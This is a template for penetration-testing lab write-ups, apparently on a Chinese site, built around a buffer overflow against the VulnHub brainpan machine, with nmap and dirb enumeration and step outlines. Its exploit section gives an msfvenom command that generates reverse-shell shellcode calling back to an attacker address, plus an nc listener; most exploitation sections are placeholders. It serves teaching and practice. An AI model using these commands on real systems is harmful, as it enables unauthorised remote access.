靶场测试Writeup编写框架
Introduction
What is the environment of the target ? What kind of technology is needed for the attack ? What is the purpose of process ?
The process to develop the exploit in this post will follow the following eight steps:
Example:
Step 1 Fuzzing Step 2 Replicating the Crash Step 3 Finding the Offset to the EIP Register Step 4 Controlling the EIP Register Step 5 Finding Space for Shellcode Step 6 Finding Bad Characters Step 7 Jumping to the ESP Register Step 8 Writing the Exploit
Tools Used
A Windows host or virtual machine
A Kali Linux host or virtual machine
OllyDbg
Python
Searchsploit
Firefox
Msfvenom
Methodologies
we need to be required to fill out this penetration testing document fully and to include the following sections :
- Overall High-Level Summary and Recommendations (non-technical)
- Methodology walkthrough and detailed outline of steps taken
- Each finding with included screenshots, walkthrough, sample code.
- Any additional items that were not included
Information Gathering
Example:
The first thing to know is the local network address by using the ip addr command.
Enumeration: Nmap
Because the VulnHub virtual machines are in a downloadable and self-hosted format the machine gets an IP address from DHCP when it starts. This means that unlike online challenges such as Hack The Box the IP address of the machine is somewhat “unknown” beforehand.
The first thing to know is the local network address by using the ifconfig command.
nmap -sP 192.168.33.0/24
Running an initial scan with Nmap reveals ports 9999 and 10000 are open.
nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial
command exaplain:
nmap - network scanner tool used to discover hosts and services on machines.
-n - No DNS resolution
-sC - preforming script scan using default scripts.
-sV - preforming service version detection.
-oA - output in all formats.
-Pn - treating the host as online - skip host discovery (it was necessary for nmap scan on this machine).
Enumeration: Firefox
Enumeration: dirb
dirb scan reveals an interesting bin directory.
Enumeration: FirefoxPermalink
Visiting the bin directory with the Firefox browser reveals a downloadable executable with the name brainpan.exe.
Debugging: Step 1 Fuzzing
Suspecting exe application is vulnerable to a buffer overflow attack a simple Python fuzzer can be written to test this.
Debugging: Setting Up the Debugging Environment
Now that we know the brainpan.exe application is vulnerable to a buffer overflow attack it is time to configure the debugging environment to help develop an exploit. Make sure to startOllyDbg as Administrator, a window looking like the one below should appear.
.
.
.
Debugging: Step 8 Writing the Exploit
it is time to finish the exploit by generating and adding some shellcode .
Msfvenom can be leveraged to generate a Windows reverse shell shellcode that connects back to a listener on our attacking machine. Make sure to exclude any bad characters that where found in Step 6 with the -b option. The generated shellcode is 351 bytes long which neatly fits in the 522 C’s we have added to our buffer variable.
Note the use of EXITFUNC=thread to make an application crash less likely when the process crashes or exits.
command explain:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 —platform linux -b “x00” -f c > sheelcode_linux_test.txt
msfvenom - rapid7 (creators of metasploit tool) tool for payload generation.
LHOST - attacker ip address.
LPORT - attacker ip port.
Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
--help-platforms List available platforms
-s, --space The maximum size of the resulting payload
--encoder-space The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars The list of characters to avoid example: 'x00xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
nc -nvlp 4444
nc - netcat, tcp and udp tool for connections and listens.
-l - listen for connections.
-v - verbose output.
-p - port number.
Exploitation: Initial Shell
……
Privilege Escalation
…..
Exploitation: System
…..
Exploitation: Root
……
Conclusion
This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 详解Linux下crontab的使用与注意事项
- Linux内核设备驱动之Linux内核基础笔记整理
- Ubuntu18.04 Server版安装及使用(图文)
- Ubuntu18.04安装vsftpd的实现代码
- ubuntu系统theano和keras的安装方法
- Linux安装Jenkins步骤及各种问题解决(页面访问初始化密码)
- 解决Ubuntu19 安装Theano问题
- centos7 esxi6.7模板实际应用详解
- Centos8搭建本地Web服务器的实现步骤
- 总结Linux 6种日志查看方法
- Ubuntu18.04一次性升级Python所有库的方法步骤
- linux下php安装xml扩展的详细步骤
- 查看linux文件的命令详解
- 解决Linux+Apache服务器URL区分大小写问题
- Centos8(最小化安装)全新安装Python3.8+pip的方法教程